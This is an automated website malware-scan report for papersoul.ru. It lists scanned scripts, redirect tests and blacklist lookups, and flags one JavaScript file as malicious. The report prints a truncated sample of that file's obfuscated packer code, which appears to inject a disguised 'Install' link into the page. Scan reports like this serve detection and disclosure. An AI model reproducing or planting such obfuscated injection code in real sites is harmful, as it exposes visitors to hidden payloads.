New scan:

Malware Scanner report for papersoul.ru

Malicious/Suspicious/Total urls checked
1/0/5
1 page has malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://papersoul.ru/
200 OK
Content-Length: 46719
Content-Type: text/html
clean
http://papersoul.ru/js/zpt.js
200 OK
Content-Length: 26284
Content-Type: application/x-javascript
clean
http://papersoul.ru/js/fnw.js
200 OK
Content-Length: 6039
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

var _0x17db=["\x3B\x28\x31\x28\x24\x29\x7B\x24\x28\x27\x23\x35\x27\x29\x2E\x32\x28\x27\x3C\x61\x20\x36\x3D\x22\x37\x3A\x2F\x2F\x38\x2E\x39\x2F\x63\x2E\x64\x3F\x65\x3D\x66\x22\x20\x67\x3D\x22\x68\x22\x20\x69\x3D\x22\x6A\x22\x20\x6B\x3D\x22\x6C\x22\x3E\u0423\u0441\u0442\u0430\u043D\u043E\u0432\u0438\u0442\u044C\x3C\x2F\x61\x3E\x27\x29\x7D\x29\x28\x33\x29\x3B\x28\x31\x28\x24\x29\x7B\x24\x28\x27\x23\x6D\x27\x29\x2E\x32\x28\x27\x3C\x70\x3E\x3C\x62\x3E\u041E\u0440\u0438\u0433\u0438\u043D\u0430\u043B\u
... 3000 bytes are skipped ...
db[5][_0x17db[4]](/^/,String)){while(_0x164cx3--){_0x164cx6[_0x164cx5(_0x164cx3)]=_0x164cx4[_0x164cx3]||_0x164cx5(_0x164cx3);} ;_0x164cx4=[function (_0x164cx5){return _0x164cx6[_0x164cx5];} ];_0x164cx5=function (){return _0x17db[6];} ;_0x164cx3=1;} ;while(_0x164cx3--){if(_0x164cx4[_0x164cx3]){_0x164cx1=_0x164cx1[_0x17db[4]]( new RegExp(_0x17db[7]+_0x164cx5(_0x164cx3)+_0x17db[7],_0x17db[8]),_0x164cx4[_0x164cx3]);} ;} ;return _0x164cx1;} (_0x17db[0],27,27,_0x17db[3][_0x17db[2]](_0x17db[1]),0,{}));

Antivirus reports:

Norman
Kryptik.CCEX

http://papersoul.ru/js/nw.js
200 OK
Content-Length: 24841
Content-Type: application/x-javascript
clean
http://papersoul.ru/test404page.js
404 Not Found
Content-Length: 1973
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: papersoul.ru

Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 18 Jul 2014 02:04:11 GMT
Server: nginx/1.6.0
Vary: Accept-Encoding
Content-Language: ru
Content-Type: text/html; charset=utf-8
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: papersoul.ru
Referer: http://www.google.com/search?q=papersoul.ru

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=papersoul.ru

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://papersoul.ru/

Result: papersoul.ru is not infected or malware details are not published yet.